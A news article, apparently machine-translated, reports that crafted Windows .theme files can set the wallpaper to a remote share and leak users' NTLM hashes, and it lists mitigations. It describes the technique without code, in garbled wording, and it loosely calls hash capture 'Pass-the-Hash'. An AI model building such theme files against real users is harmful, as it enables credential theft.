Windows allows users to create custom themes that contain colors, sounds, mouse cursors, and wallpaper that the operating system uses.
The users Windows can then change themes to change the look of the operating system.
The settings of a theme are saved in the folder % AppData% \ Microsoft \ Windows \ Themes, as a file with a .theme extension (eg "Custom Dark.theme").
These desktop theme packages can then be be notified via e-mail or as downloads on websites and be installed by double-clicking on them.
But the security researcher Jimmy Bayne (@bohops) revealed that specially designed Windows themes could be used for execution of Pass-the-Hash attacks.
Pass-the-Hash attacks are used for Windows credentials theft (login names and password hashes), tricking the user into connecting to a remote one server file sharing, which needs login confirmation.
Upon acquisition access, Windows will automatically try to connect to the remote system by sending the user login name and an NTLM hash of the password.
In a Pass-the-Hash attack, the credentials sent are collected by them hackers, who then try to do password dehash to access the login name and password of the users.
Dehashing an easy password can be done in a matter of seconds.
In the new method discovered by Bayne, an attacker can create a specially designed .theme file and change the desktop wallpaper setting to use a system which requires remote authentication.
The user details are then sent in the manner described above. The attacker can collect credentials and do dehashing using special scripts.
As Microsoft moves away from local Windows 10 accounts, remote intruders can use this attack to more easily access the thousands of remote services offered by Microsoft.
This includes possible access to e-mail, Azure or in corporate networks, remotely.
Bayne said he revealed the attack to Microsoft earlier this year, but was told it would not be fixed, as it is "design-specific".
Windows malware protection
Bayne recommended excluding extensions: .theme, .themepack and .desktopthemepackfile. However, this will shut down "Windows 10 Themes", So users can only do this if they do not need to move on to another topic.
Windows 10 users can also use “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers”And set it to“Deny AllTo prevent NTLM credentials from being sent remotely systems.
Finally, the multi-factor authentication application in Microsoft accounts is a good practice to prevent it access third parties in the account.